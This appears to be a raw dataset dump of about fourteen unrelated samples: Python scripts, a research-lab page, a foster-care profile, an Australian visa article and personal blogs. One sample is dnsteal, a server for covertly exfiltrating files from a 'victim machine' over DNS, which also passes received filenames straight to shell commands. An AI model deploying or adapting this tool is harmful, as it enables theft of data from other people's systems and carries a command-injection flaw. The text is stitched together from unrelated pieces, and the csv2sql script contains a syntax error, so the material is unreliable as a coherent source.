text
stringlengths
29
850k
#!/usr/bin/python from gi.repository import Gtk, GObject from gi.repository import AppIndicator3 as appindicator import urllib, re, os, time, datetime def openit(*args): os.system("xdg-open http://www.indiegogo.com/projects/ubuntu-edge") # both UTC STARTTIME = datetime.datetime(2013, 7, 22, 15, 0, 0) ENDTIME = datetime.datetime(2013, 8, 22, 7, 0, 0) def update(*args): # screen scraping of glory fp = urllib.urlopen('http://www.indiegogo.com/projects/ubuntu-edge') data = fp.read() mtch = [x for x in data.split('\n') if '$2,' in x and 'amount' in x and 'medium' in x] if len(mtch) != 1: ind.set_label("?????", "$32.00m") return True val = re.search("\$([0-9,]+)<", mtch[0]) val = val.groups()[0] val = val.replace(",", "") val = int(val) mval = val / 1000000.0 ind.set_label("$%0.2fm" % mval, "$32.0m") lst.get_child().set_text("Last updated: %s" % time.strftime("%H:%M")) now = datetime.datetime.utcnow() done = now - STARTTIME togo = ENDTIME - now done_seconds = (done.days * 24 * 60 * 60) + done.seconds togo_seconds = (togo.days * 24 * 60 * 60) + togo.seconds ratio = float(togo_seconds) / done_seconds projected = val + (ratio * val) mprojected = projected / 1000000.0 prj.get_child().set_text("Projected: $%0.2fm" % mprojected) return True if __name__ == "__main__": ind = appindicator.Indicator.new("ubuntu-edge-indicator", "", appindicator.IndicatorCategory.APPLICATION_STATUS) ind.set_status(appindicator.IndicatorStatus.ACTIVE) ind.set_label("$$$$$", "$32.0m") menu = Gtk.Menu() opn = Gtk.MenuItem("Open IndieGogo") menu.append(opn) lst = Gtk.MenuItem("Last updated: ?????") menu.append(lst) prj = Gtk.MenuItem("Projected: ?????") menu.append(prj) menu.show_all() opn.connect("activate", openit) ind.set_menu(menu) GObject.timeout_add_seconds(300, update) update() Gtk.main()
1) how do the structure and function of wetlands and streams respond to local land-use and global climate change? 2) can current and emerging management tools reverse or restore the functioning of wetlands and streams? If you are interested in joining us as a graduate student please look through the website and then send Marcelo an email with your CV and research interests. We welcome students, postdocs, and visiting scholars regardless of race, religion, gender identification, sexual orientation, age, or disability status. We believe that the more diverse the lab is, the better we will be at advancing our understanding of our changing world. January 2019- Check out our new papers in Biogeochemistry and Ecosystems regarding greenhouse gas emissions from wetlands in response to drought and flooding. -August 2018- We had a successful summer with two REUs in North Carolina and two REUs in Costa Rica. -January 2018- Steve Anderson joined the lab to pursue his MS. -August 2017- Melinda Martinez and Nick Marzolf joined the lab as PhD students. Gillian Gundersen successfully defended her MS thesis! July 2017- I need to be better at updating lab news! We have been busy settling in at NCSU. Updates on the lab instruments coming soon. We presented at SFS in Raleigh. Marcelo traveled to Costa Rica to start the new round of the LTREB project. We have been swamped with field work with our NC wetlands work. Two new students will join the lab this summer (more info to come!). -August 2016-It has been a busy summer. We had three REUs and an RET working in the lab. And at the end of the summer we moved to the Department of Forestry and Environmental Resources at NCSU! -April 2016- Congrats to Tori for successfully defending her MS thesis. She answered the question in everybody's mind: what the floc? -February 2016- we will be moving to NCSU Department of Forestry and Environmental Resources in the Fall. -November- Kudos to Tori for representing the lab in ECU's 3 Minute Thesis competition and a symposium at the Duke Marine Lab! -September- Beginning of new semester and Ashley's paper is out in Ecology Letters! -August 15- Luise Armstrong, Matt Stillwagon, and Gillian Gunderson join the lab! Harriot College of Arts and Sciences! -23 April 15- Our Global Change Biology paper was awarded the Mercer award by ESA! -15 April 15- Marcelo receives NSF CAREER award!
# Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.building.DistributedToonHouseInterior from direct.distributed.DistributedObject import DistributedObject from toontown.building.HouseInterior import HouseInterior from toontown.toon.DistributedNPCToonBase import DistributedNPCToonBase from ZoneBuilding import ZoneBuilding class DistributedToonHouseInterior(DistributedObject, HouseInterior, ZoneBuilding): def __init__(self, cr): DistributedObject.__init__(self, cr) HouseInterior.__init__(self) self.ownerId = -1 self.director = None self.posIndices = [] return def getBlock(self): return self.block def announceGenerate(self): DistributedObject.announceGenerate(self) self.setup() self.setPosIndices(self.posIndices) def disable(self): HouseInterior.disable(self) DistributedObject.disable(self) def getInteriorObject(self): return self def setPosIndices(self, posIndices): self.posIndices = posIndices if not self.interior: return for i, posHpr in enumerate(self.posIndices): origin = self.interior.find('**/npc_origin_%s' % i) if origin.isEmpty(): origin = self.interior.attachNewNode('npc_origin_%s' % i) origin.setPosHpr(*posHpr) for npcToon in self.cr.doFindAllInstances(DistributedNPCToonBase): npcToon.initToonState()
Profile Response: Matt Cleveland, Little Rock AR | How Will We Live Tomorrow? Arkansas Governor Asa Hutchinson has described a crisis in the state’s foster care system. There are twice as many children in need of foster care as available placements. The governor is trying to increase the number of foster homes, particularly among faith-based communities. One established foster care setting is the Sherriff’s Youth Ranch, a compound of four eight-children houses that has the capability to double capacity. Matt Cleveland, Development Director, described the situation and some of the hurdles the foster system faces. “Our history is of sheriff’s finding children with no where to go.” Forty years ago, they banded together, purchased a ranch outside Batesville, and began Youth Ranch. The organization is sponsored by all 75 county sheriff departments in the state. Youth Ranch grew to three campuses, but the economics of operating multiple sites proved difficult, so the group is focusing on its original ranch and hopes to expand operations there. Certain aspects of Youth Ranch are more generous than traditional foster care. Foster children age out of the system at 4 p.m. on their eighteenth birthday. At Youth Ranch a boy, or less often a girl, “can stay until they transition out as long as they follow the rules and work towards a goal, even up to age 21.” Youth Ranch residents also have educational goals and opportunity to work outdoors: the setting includes a 600 acres working cattle ranch. Creating a nurturing and stimulating environment for the children costs money. It takes $30,000 a year to support a child at Youth Ranch. “The state’s foster care allowance covers only 10% of our budget.” That’s a lot of money compared with raising a child in a family household, but only a fraction of what adults gone astray can cost society. “I figure we’ve got to figure out ways to live together. We have more commonalities than we find on social media. More binds us than divides. We have to find more ways to open up to each other. It doesn’t have to be, but it might be, opening your home. Things aren’t going to get better until we do that. This entry was posted in Responses and tagged Arkansas Sherriff's Youth Ranch, Matt Cleveland. Bookmark the permalink.
#!/usr/bin/env python ##################### import socket import sys import binascii import time import random import hashlib import zlib import os class DNSQuery: def __init__(self, data): self.data = data self.data_text = '' tipo = (ord(data[2]) >> 3) & 15 # Opcode bits if tipo == 0: # Standard query ini=12 lon=ord(data[ini]) while lon != 0: self.data_text += data[ini+1:ini+lon+1]+'.' ini += lon+1 lon=ord(data[ini]) def request(self, ip): packet='' if self.data_text: packet+=self.data[:2] + "\x81\x80" packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts packet+=self.data[12:] # Original Domain Name Question packet+='\xc0\x0c' # Pointer to domain name packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP return packet def banner(): print "\033[1;31m", print """ ___ _ _ ___ _ _ | \| \| / __| |_ ___ __ _| | | |) | .` \__ \ _/ -_) _` | | |___/|_|\_|___/\__\___\__,_|_| -- https://github.com/nemanjan00/dnsteal.git --\033[0m Stealthy file extraction via DNS requests """ if __name__ == '__main__': try: ip = sys.argv[1] ipr = sys.argv[2] ipr = socket.gethostbyname(ipr) except: banner() print "Usage: %s [listen_address] [return_ip]" exit(1) banner() udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp.bind((ip,53)) print '\033[1;32m[+]\033[0m DNS listening on %s:53' % ip print "\033[1;32m[+]\033[0m Now on the victim machine, use the following command:" while 1: try: data, addr = udp.recvfrom(1024) p=DNSQuery(data) udp.sendto(p.request(ipr), addr) print 'Request: %s -> %s' % (p.data_text, ipr) filename = "" data = p.data_text data = data.replace("/", "") data = data.replace("\\", "") data = data.split(".") for index,item in enumerate(data): if(index < len(data) - 3): if(index == 1): filename = item if(index > 1): filename += "." + item os.popen("mkdir -p data") filename = "data/"+filename if(data[0] != "gunzip"): f = open(filename, "a") f.write(binascii.unhexlify(data[0])) f.close() else: os.popen("mv " + filename + " " + filename + ".ori ; cat " + filename + ".ori | gunzip > " + filename) except Exception: pass
Patrons enjoyed a relaxed dinner whilst listening to performances from the Sheldon College Big Band, Stage Band, Jazz Project, Dixieland Band and Eve Vocal Ensemble. The night afforded students from Year 6 to Year 12 the valuable experience of performing in front of a live audience at an external venue. Our debut performers, Stage Band, kicked off the evening with a fantastic performance, followed by The Jazz Project, made up of senior students, who entertained the crowds with their relaxed style of Jazz.; Eve Vocal Ensemble followed and, once again, sang like angels to a very appreciative crowd. Dixieland were the next band to take to the stage, giving us a lively and exciting performance under the new direction of Ms Julianne Moore. To round off the evening, our outstanding Big Band performed great big band music, with the help of our jazz vocalists, for over half an hour.
from django.conf.urls import patterns, url, include from abo.utils import import_backend_modules backend_specific_urls = [] for backend_name, urls in import_backend_modules('urls').items(): simple_name = backend_name.split('.')[-1] backend_specific_urls.append(url(r'^%s/' % simple_name, include(urls))) from .views import ( CancelView, ChangeCardView, ChangePlanView, HistoryView, SubscribeView, SubscriptionSuccessView, SubscriptionFailureView ) urlpatterns = patterns('', url(r"^subscribe/$", SubscribeView.as_view(), name="abo-subscribe"), url(r"^subscription/(?P<pk>\d+)/success/$", SubscriptionSuccessView.as_view(), name="abo-success"), url(r"^subscription/(?P<pk>\d+)/failure/$", SubscriptionFailureView.as_view(), name="abo-failure"), url(r"^change/card/$", ChangeCardView.as_view(), name="abo-change_card"), url(r"^change/plan/$", ChangePlanView.as_view(), name="abo-change_plan"), url(r"^cancel/$", CancelView.as_view(), name="abo-cancel"), url(r"^history/$", HistoryView.as_view(), name="abo-history"), *backend_specific_urls )
Our accessible, tidy and well organised yard is here to make your scrap metal recycling experience as enjoyable and hassle-free as possible. We aim to deliver the highest levels of customer service and adhere to the very best health and safety standards across all aspects of our business. If you have scrap metal to drop off, our respectful and friendly team are here to help you unload, get weighed and get paid. If you have larger amounts of scrap metal that is too big for you to drop off, then we can offer a dedicated pickup service. We always go out of our way to give every customer an enjoyable experience and get the very best recycling deals. For more information or to get paid for your scrap metal please call us on 0800 226 626 or 03 384 4059. Suzanne is an excellent trade rep. With 20 years experience in the scrap metal industry, she is expertly poised to offer practical and reliable advice on any metal recycling service you need. An expert in getting things done, Suzanne knows the market and how to get the very best deals for all her customers. Originally from the United Kingdom, Suzanne is proud to call Christchurch home. She loves her job and loves meeting new people every single day. If you have any scrap metal that needs recycling, Suzanne will get you paid the very best rate, on time. A problem solver and practical man, Brendan is a friendly, reliable and hardworking rep who loves helping his customers get the best deal for their scrap metal. If you have any questions about any scrap metal you need recycling, give Brendan a call and he will do everything he can to help you recycle it.
#!/usr/bin/env python3 # # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import struct import os import threading import re import functools import codecs import psutil import asyncio import asyncio.subprocess def re_findall(q, s): idx = 0 while True: match = re.search(q, s[idx:]) if not match: break yield idx+match.start() idx += match.start()+1 def string_findall(q, s): idx = 0 while True: idx = s.find(q, idx) if idx < 0: break yield idx idx = idx+1 class GDBInterrupt(object): def __init__(self): pass class GDBCommand(object): def __init__(self, data, reply_queue = None): self.data = data self._reply_queue = reply_queue def will_continue(self): return self._reply_queue == None async def reply(self, pkt): if self._reply_queue: await self._reply_queue.put(pkt) class GDBError(object): def __init__(self, msg): self.msg = msg class GDBReply(object): def __init__(self, data): self.data = data def is_stop_reply(self): return self.data.startswith(b'T') class ExitMsg(object): def __init__(self): pass def gdb_checksum(cmd): checksum = functools.reduce(lambda csum, c: (csum+c)%256, cmd, 0) return '{:02x}'.format(checksum).encode('ascii') def gdb_encode(s): out = b'' for c in s: if c in b'#$}': out += b'}'+bytes([c ^ 0x20]) else: out += bytes([c]) return out def gdb_decode(s): out = b'' i = 0 while i < len(s): c = s[i] if c == ord('*'): cnt = s[i+1] - 29 out += bytes([out[-1]]*cnt) i += 2 elif c == ord('}'): c = s[i+1] c = bytes([c ^ 0x20]) out += c i += 2 else: out += bytes([c]) i += 1 return out def gdb_format_cmd(s): return b'$' + s + b'#' + gdb_checksum(s) def gdb_make_pkt(data): return gdb_format_cmd(gdb_encode(data)) async def message_broker(pkt_queue, reply_queue, stop_reply_queue, gdbserver_stdin): stopped = True while True: pkt = await pkt_queue.get() if isinstance(pkt, GDBCommand): if not stopped: await pkt.reply(GDBError('not stopped')) continue gdbserver_stdin.write(gdb_make_pkt(pkt.data)) if pkt.will_continue(): stopped = False continue reply = await reply_queue.get() await pkt.reply(reply) elif isinstance(pkt, GDBInterrupt): if stopped: continue gdbserver_stdin.write(b'\x03') elif isinstance(pkt, ExitMsg): return else: assert isinstance(pkt, GDBReply) assert pkt.is_stop_reply() assert not stopped stopped = True await stop_reply_queue.put(pkt) async def packet_reader(pkt_queue, reply_queue, gdbserver_stdout): while True: next_char = await gdbserver_stdout.read(1) if not next_char: return if next_char == b'+': # ignore acks continue if next_char != b'$': raise Exception('unexpected character (want $, got {!r})'.format(next_char)) pkt = b'' pkt += (await gdbserver_stdout.readuntil(b'#'))[:-1] checksum = await gdbserver_stdout.read(2) if not checksum == gdb_checksum(pkt): raise Exception('wrong checksum {} vs {}, "{}"'.format(checksum, gdb_checksum(pkt), pkt)) reply = GDBReply(gdb_decode(pkt)) if reply.is_stop_reply(): await pkt_queue.put(reply) else: await reply_queue.put(reply) class GDBProcess(object): @staticmethod async def create(argv, stop_reply_queue, env={}, log_fn=None): self = GDBProcess() self._bp_mutex = threading.Lock() self._breakpoints = {} self._log_fn = log_fn self._p = await asyncio.create_subprocess_exec('gdbserver', '--once', '-', *argv, stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE, preexec_fn=os.setsid, env=env, close_fds=True, bufsize=0) self._pkt_queue = asyncio.Queue() reply_queue = asyncio.Queue() loop = asyncio.get_event_loop() self._msg_broker = loop.create_task(message_broker(self._pkt_queue, reply_queue, stop_reply_queue, self._p.stdin)) self._pkt_reader = loop.create_task(packet_reader(self._pkt_queue, reply_queue, self._p.stdout)) self._proc_dir_fd = None await self._start_no_ack() return self def breakpoints(self): return list(self._breakpoints.keys()) def _log(self, msg): if self._log_fn: self._log_fn(msg) async def release(self): self._log('killing gdb process') self._msg_broker.cancel() self._pkt_reader.cancel() os.killpg(os.getpgid(self._p.pid), 9) await self._p.wait() self._log('killed gdb process') def open_proc_file(self, filename, mode='r'): if not self._proc_dir_fd: child_processes = psutil.Process(self._p.pid).children() assert len(child_processes) == 1 child_pid = child_processes[0].pid self._proc_dir_fd = os.open('/proc/{}/'.format(child_pid), os.O_PATH) return open('/proc/self/fd/{}/{}'.format(self._proc_dir_fd, filename), mode) def maps(self): mappings = [] with self.open_proc_file('maps', 'r') as fd: for line in fd.read().splitlines(): start,end,perm,name = re.match('^([0-9a-f]+)-([0-9a-f]+)\s+([rwx-]{3})p\s+[0-9a-f]+\s+[0-9a-f]{2}:[0-9a-f]{2}\s+[0-9a-f]+\s+(.*)$', line).groups() start = int(start, 16) end = int(end, 16) size = end - start mappings.append((start, size, perm, name)) return mappings def search(self, q, qtype, max_match_count = 64): mappings = self.maps() matches = [] with self.open_proc_file('mem', 'rb') as mem_fd: for start, size, perm, _ in mappings: try: mem_fd.seek(start) except ValueError: continue except OverflowError: self._log('overflow error') continue try: data = mem_fd.read(size) except IOError: continue try: if qtype == 'regex': search_fn = re_findall else: search_fn = string_findall if qtype != 'string': if qtype == 'char': format_char = 'B' elif qtype == 'short': format_char = 'H' elif qtype == 'int': format_char = 'I' else: # long format_char = 'Q' q = struct.pack(format_char, int(q, 0)) for idx in search_fn(q, data): match = data[idx:idx+max(32, len(q))] matches.append([start+idx, match]) if len(matches) > max_match_count: break except ValueError: continue return matches async def _write_pkt(self, cmd): self._log('_write_pkt("{}")'.format(cmd)) reply_queue = asyncio.Queue(maxsize=1) await self._pkt_queue.put(GDBCommand(cmd, reply_queue)) pkt = await reply_queue.get() if isinstance(pkt, GDBError): raise Exception(pkt.msg) assert isinstance(pkt, GDBReply) return pkt.data async def _start_no_ack(self): resp = await self._write_pkt(b'QStartNoAckMode') if resp != b'OK': raise Exception('NoAck response: "{}"'.format(resp)) self._p.stdin.write(b'+') async def set_breakpoint(self, addr): with self._bp_mutex: if addr in self._breakpoints: return self._log('setting breakpoint at 0x{:x}'.format(addr)) hardware_breakpoint = len(self._breakpoints) < 4 command = 'Z1' if hardware_breakpoint else 'Z0' resp = await self._write_pkt('{},{:x},1'.format(command, addr).encode('ascii')) if resp != b'OK': raise Exception('Breakpoint error: "{}"'.format(resp)) self._breakpoints[addr] = hardware_breakpoint async def remove_breakpoint(self, addr): with self._bp_mutex: hardware_breakpoint = self._breakpoints[addr] command = 'z1' if hardware_breakpoint else 'z0' resp = await self._write_pkt('{},{:x},1'.format(command, addr).encode('ascii')) if resp != b'OK': raise Exception('Breakpoint error: "{}"'.format(resp)) del self._breakpoints[addr] def _cont(self, mode): self._pkt_queue.put_nowait(GDBCommand(b'vCont;'+mode)) def cont(self): self._cont(b'c') def step(self): self._cont(b's') def interrupt(self): self._log('interrupting with 0x03') self._pkt_queue.put_nowait(GDBInterrupt()) _REG_NAMES = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", "rip", "eflags", "cs", "ss", "ds", "es", "fs", "gs"] async def get_reg(self, name): return (await self.get_regs())[name] async def get_regs(self): resp = await self._write_pkt(b'g') data = codecs.decode(resp, 'hex_codec') regs = {} for i in range(len(GDBProcess._REG_NAMES)): regs[GDBProcess._REG_NAMES[i]] = struct.unpack('Q', data[i*8:(i+1)*8])[0] return regs def read_mem(self, addr, count): data = b'' with self.open_proc_file('mem', 'rb') as mem_fd: try: mem_fd.seek(addr) data = mem_fd.read(count) except: try: mem_fd.seek(addr) for i in range(count): data += mem_fd.read(1) except: pass return data async def main(): def log(msg): print('[*] {}'.format(msg)) stop_queue = asyncio.Queue() import time print('creating process') p = await GDBProcess.create(['/bin/sleep', '5'], stop_queue, log_fn=log) print('process created') await p.set_breakpoint(0x7ffff7dda886) print('breakpoint at 0x7ffff7dda886') p.cont() await stop_queue.get() for i in range(10): p.step() await stop_queue.get() print(hex((await p.get_regs())['rip'])) p.cont() await asyncio.sleep(0.1) p.interrupt() await stop_queue.get() print(hex((await p.get_regs())['rip'])) await p.release() if __name__ == "__main__": loop = asyncio.get_event_loop() loop.run_until_complete(main()) loop.close()
This article explains how these changes will affect visa applicants. The Migration Legislation Amendment (2017 Measures No. 4) Regulations 2017 F2017L01425 was disallowed on 5 December 2017. Note that the changes may still apply to applications lodged between 18 November and 5 December 2017. The main concern appears to be the changes to the 4020 Public Interest Criterion - it is quite possible the Government will seek to re-introduce the other initiatives in the instrument, and possibly a revised version of the changes to 4020. This article gives a good indication of the Government's intentions going forward. The relevant legislation - the Migration Amendment (Family Violence and Other Measures) Bill 2016 - has not yet passed the Senate and has been referred to a Senate Committee for Consideration. We will update readers when we have further information about this matter. These changes are no longer in effect due to the disallowance of F2017L01425. an application which has been refused in the last 3 years (or 5 years in some cases). In other words, if false or misleading information is provided in a visa application, it could affect future applications for up to 10 years. Previously, it was possible to withdraw a visa application if false or misleading information had been provided and this would not necessarily result in 4020 refusals for future applications. This will no longer work as 4020 will apply for any visa applications made within the last 10 years, whether the application is granted, refused or withdrawn. One of the commonly encountered issues with 4020 is the failure to declare past criminal records when making a visa application. Generally, a declaration about previous offences is included in the visa application form. If this is not correctly completed, it can trigger 4020 issues. This would affect both the current application, and potentially any future applications for the next 10 years. Australian Governments have expressed concern about health care costs which have been incurred by temporary visa holders in Australia but not repaid. As a result, a new visa condition 8602 which requires applicants for temporary visas not to have an outstanding public health debt. This would apply to medical costs owing to either Australian state, territory or federal governments. If a temporary visa holder incurs a public health debt, this could result in cancellation of their current visa and also make it more difficult to obtain subsequent visas. A definition of "Adequate arrangements for health insurance" has been added to the Migration Regulations. This allow the Minister to specify what kind of health insurance will meet visa requirements. The intention of this change is to reduce the risk of identity fraud, and the example is provided of the Martin Place Siege perpetrator (Man Haron Monis). He used multiple identities when dealing with Australian Government Agencies. Condition 8564 forbids the visa holder to engage in criminal activities in Australia. Previously it only applied to Bridging E visas. The condition will now apply to a wide range of temporary visas. Condition 8303 has been broadened to prohibit activities which endanger or threaten individuals. Previously, it only applied to violent or disruptive activities affecting the Australian community more broadly. As a result it will be easier for Immigration to cancel temporary visas of people engaging in criminal or other dangerous activities in Australia. The changes to 4020 make it more important than ever to ensure that false or misleading information is not provided when making a visa application. New health conditions apply to temporary visas - these could affect people needing medical treatment in Australia and so ensuring that you have suitable health insurance is very important. If you would like assistance with a visa issue, please book a consultation with one of our advisors to get detailed advice.
import argparse import matplotlib.pyplot as plt import numpy import mir3.data.feature_track as feature_track def plot(input_filename, output_filename, scale=None, dim=0, size=(3.45,2.0)): """Plots the a spectrogram to an output file """ s = feature_track.FeatureTrack().load(input_filename) if s.data.ndim > 1: d = s.data[:,dim] else: d = s.data min_y = numpy.min(d) max_y = numpy.max(d) min_time = 0 max_time = float(len(d)) / s.metadata.sampling_configuration.ofs ylabel = s.metadata.feature.split()[dim] if scale is not None: ylabel += ' (' ylabel += str(scale) ylabel += ')' x_axis = numpy.array(range(len(d))) / \ float(s.metadata.sampling_configuration.ofs) im = plt.plot(x_axis, d) plt.xlabel('Time (s)') plt.ylabel(ylabel) fig = plt.gcf() width_inches = size[0]#/80.0 height_inches = size[1]#/80.0 fig.set_size_inches( (width_inches, height_inches) ) plt.savefig(output_filename, bbox_inches='tight') if __name__ == "__main__": parser = argparse.ArgumentParser(description='Plot a spectrogram') parser.add_argument('infile', type=argparse.FileType('rb'),\ help="""Input spectrogram file""") parser.add_argument('outfile',\ help="""Output figure file""") parser.add_argument('--dim', type=int, default=0, help="""Dimension to plot (used in multidimensional feature tracks)""") parser.add_argument('--scale', default=None, help="""Scale to use in y-axis label""") parser.add_argument('--width', type=int, default=3.45, help="""Output width\ (inches).\ Default: 3.45 (one column)""") parser.add_argument('--height', type=int, default=2.0, help="""Output\ height (inches).\ Default: 2.0""") args = parser.parse_args() plot(args.infile, args.outfile, args.scale, args.dim, \ (args.width, args.height))
do a lot at one time. When Mark went in to get on the internet, I stayed on the boat. It looked like rain, and yesterday’s laundry was still not dry. I wanted to leave it out, but be here to take it in if the skies opened up. Well, the skies didn’t “open up” but they drizzled all morning while the sun was shining. I took laundry in and put it back out, and took it in again and put it out again. It was that kind of day. woman there to take a message for us. We went into town to do some shopping and when we returned, we found Adrian waiting for us on the dinghy dock. He had called us back and left the message that he would be here at 3:00, but we were in town and didn’t get the message. In any event, he came out with us and once again tried to balance our system. Mark is still not sure things are quite right, but we will have to wait until about noon tomorrow before we can make that final determination. We have decided to check-out of Vanuatu on Wednesday and we have a reservation to fill-up with duty-free fuel on Thursday morning at 8 AM. It still looks like Friday is the best day to head to New Caledonia, but we will be ready to leave on Thursday afternoon if the weather should change in our favor. downtown shop but are anxious to see the gallery. I’m secretly hoping that we can go to Mele Island, also known as Hideaway Island, on Thursday after we get our fuel. We could spend the night there and leave for New Caledonia on Friday. But then, you are never supposed to start a crossing on a Friday, so maybe we will just have to leave on Thursday. We’ll have to keep you posted on this one.
#!/usr/bin/env jython """ ccsv2sql Utility to convert a CSV file to a SQL dump. Copyright 2015 Sam Saint-Pettersen. Licensed under the MIT/X11 License. Tweaked for Jython. """ import sys import csv import os import re import datetime import getopt signature = 'ccsv2sql 1.0.6 [Jython] (https://github.com/stpettersens/ccsv2sql)' def displayVersion(): print('\n' + signature) def displayInfo(): print(__doc__) def ccsv2sql(file, out, separator, db, comments, verbose, version, info): if len(sys.argv) == 1: displayInfo() sys.exit(0) if file == None and out == None: if verbose == False and version == True and info == False: displayVersion() elif verbose == False and version == False and info == True: displayInfo() sys.exit(0) if out == None: out = re.sub('.csv', '.sql', file) if file.endswith('.csv') == False: print('Input file is not a CSV file.') sys.exit(1) if out.endswith('.sql') == False: print('Output file is not a SQL file.') sys.exit(1) basename = os.path.basename(out) table = re.sub('.sql', '', basename) if separator == None: separator = ',' if comments == None: comments = True fields = [] rows = [] csvfile = open(file, 'r') f = csv.reader(csvfile, delimiter=separator) headers = True for row in f: if headers: fields = separator.join(row).split(separator) headers = False else: rows.append(row) csvfile.close() dtable = 'DROP TABLE IF EXISTS `%s`;' % table ctable = 'CREATE TABLE IF NOT EXISTS `%s` (\n' % table insert = 'INSERT INTO `%s` VALUES (\n' % table inserts = [] x = 0 for value in rows[0]: key = fields[x] fvalue = re.sub('\'|\"', '', value) tvalue = re.sub('\.', '', fvalue) if value.startswith('ObjectId('): ctable += '`%s` VARCHAR(24),\n' % key elif tvalue.isdigit() == False: pattern = re.compile('\d{4}\-\d{2}\-\d{2}') if pattern.match(value): ctable += '`%s` TIMESTAMP,\n' % key pattern = re.compile('true|false', re.IGNORECASE) if pattern.match(value): ctable += '`%s` BOOLEAN,\n' % key else: length = 50 if key == 'description': length = 100 ctable += '`%s` VARCHAR(%d),\n' % (key, length) else: ctable += '`%s` NUMERIC(15, 2),\n' % key x = x + 1 x = 0 for row in rows: ii = '' for value in rows[x]: fvalue = re.sub('ObjectId|\(|\)|\'|\"', '', value) tvalue = re.sub('\.', '', value) if tvalue.isdigit() == False: pattern = re.compile('\d{4}\-\d{2}\-\d{2}') if pattern.match(value): fvalue = re.sub('\T', ' ', fvalue) fvalue = re.sub('\.\d{3}Z', '', fvalue) fvalue = re.sub('\.\d{3}\+\d{4}', '', fvalue) pattern = re.compile('true|false|null', re.IGNORECASE) if pattern.match(value): ii += '%s,\n' % fvalue.upper() continue ii += '\'%s\',\n' % fvalue else: ii += '%s,\n' % fvalue ii = ii[:-2] inserts.append(insert + ii + ');\n\n') ii = '' x = x + 1 ctable = ctable[:-2] ctable += ');' if verbose: print('\nGenerating SQL dump file: \'%s\' from\nCSV file: \'%s\'\n' % (out, file)) f = open(out, 'w') f.write('-- !\n') if comments: f.write('-- SQL table dump from CSV file: %s (%s -> %s)\n' % table, file, out)) f.write('-- Generated by: %s\n' % signature) f.write('-- Generated at: %s\n\n' % datetime.datetime.now()) if db != None: f.write('USE `%s`;\n' % db) f.write('%s\n' % dtable) f.write('%s\n\n' % ctable) for insert in inserts: f.write(insert) f.close() # Handle any command line arguments. try: opts, args = getopt.getopt(sys.argv[1:], "f:o:s:d:nlvi") except: print('Invalid option or argument.') displayInfo() sys.exit(2) file = None out = None separator = None db = None comments = None verbose = False version = False info = False for o, a in opts: if o == '-f': file = a elif o == '-o': out = a elif o == '-s': separator = a elif o == '-d': db = a elif o == 'n': comments = False elif o == '-l': verbose = True elif o == '-v': version = True elif o == '-i': info = True else: assert False, 'unhandled option' ccsv2sql(file, out, separator, db, comments, verbose, version, info)
Overcast skies and cooler temperatures suggest impending rain later today, maybe even thunderstorms. Not too many folks out and about yet this morning, but we're anticipating more people stopping by as the day progresses, especially if a light rain keeps them off the beach! It's hard to believe, but June is almost upon us. Summer vacations have already started, although it won't be until mid-June, after high school graduations, that the season really picks up. The island's next big event is coming up the first weekend in June -- our annual Ocrafolk Festival of Music & Storytelling. If you're on the island, stop by and say hello. On Wednesday, May 26, "Green Tuna" inquired, "I'd be interested to know...how many people have graduated from Ocracoke [School]...ever?" Two weeks from now, on June 13, four seniors will receive their diplomas -- Jimmy Wrobleski, Amara Wollerman, Tucker Payne, and Brandon Lawson. They will make a total of 446 island students who have "walked down the aisle" since the first graduating class in 1931. That's an average of just over 6 seniors each year. Today is another virtually perfect day with sunny skies and temperatures in the 80's. Every now and then I will be sharing a distinctive Ocracoke Island word or expression. Today's word is "fladget." It means a small piece or chunk of something, generally food, as in "Cut me a fladget of meat, please." It can also be used in other ways, as in "I tore a fladget of skin off my finger when I was opening clams." Look for more words in the future. With High School graduations approaching I am reminded of those many T-shirts that list all of the graduating seniors on the back of the shirt. Ocracoke School has a T-shirt that lists every person who has ever graduated from the school! Kevin Cutler reminded me that twice in Ocracoke's history the graduating class consisted of only one senior: Walter Potter Garrish in 1947 and Elmo Murray Fulcher in 1957. In 1946 & 1955 there were no graduates. On May 24, 1921 the schooner "Mary J. Haynie" wrecked on Ocracoke's beach. On today's date, May 25, in 1884 the steamer "Glasbolt" from Scotland wrecked at Ocracoke's South Point. Relatively small portions of a few of the many shipwrecks along our coast can still sometimes be seen on the beach. Most of them are covered by sand but may be exposed after storms and hurricanes. Within the last couple of months some old coins were found on the beach. Metal detectors are illegal in the National Seashore, but keep your eyes open! A couple of days ago two folks who joined me for my Ghost & History Walk (I know this is another blatant and transparent plug for my new venture), stopped into Cathy Scarborough's shop, "Over the Moon." Cathy's daddy, and my good friend, Al, was working the counter when Myrna & Marilyn commented on how wonderful the Tuesday evening tour was. They talked about Rob Hanks who, in the mid 1950's, would "tell the story of Ocracoke" for a dime. I like to point out that property values have risen about 1000 times in the last fifty years, and at the same rate of inflation my tour should be worth $100.00 (so, of course, it's a terrific bargain at only $12.00). Al, being the curmudgeon that he is, reminded these two very nice women that a soft drink which sold for a nickel in 1955 could be bought today for only 65 cents. That, he asserted, would make my tour only worth $1.30! As I was waking up this morning it occurred to me that Rob Hanks' "Story of Ocracoke" only took about 10 minutes to relate. So even by Al's reckoning my 95 minute tour is still a bargain at $12.00. "His deductions and conclusions are always logical, plausible, stimulating, and delivered with clarity and pungency. Unfortunately they are nearly always mistaken." Lucky me! My neighbors (neighbors for the week that is -- down from Maine for a little vacation) have invited me over for fish and fresh clams that they gathered out in Pamlico Sound this afternoon. At noon our family met at Cafe Atlantic for brunch to celebrate my daughter, Amy's, birthday. Life is good! Finally, last night, the village was treated to rain. It came down in torrents to water our yards, trees, and gardens. By morning the sky 